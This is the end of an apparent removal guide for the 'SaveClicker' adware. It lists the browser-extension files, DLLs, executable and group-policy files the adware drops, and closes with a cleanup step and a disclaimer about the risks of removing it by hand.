    %Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %System%\GroupPolicy\Machine\Registry.pol (264 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe (26944 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Program Files%\SaveClicker\vWxdeLnb7d.tlb (259 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Program Files%\SaveClicker\vWxdeLnb7d.x64.dll (30600 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %System%\GroupPolicy\gpt.ini (315 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Program Files%\SaveClicker\vWxdeLnb7d.dll (26032 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
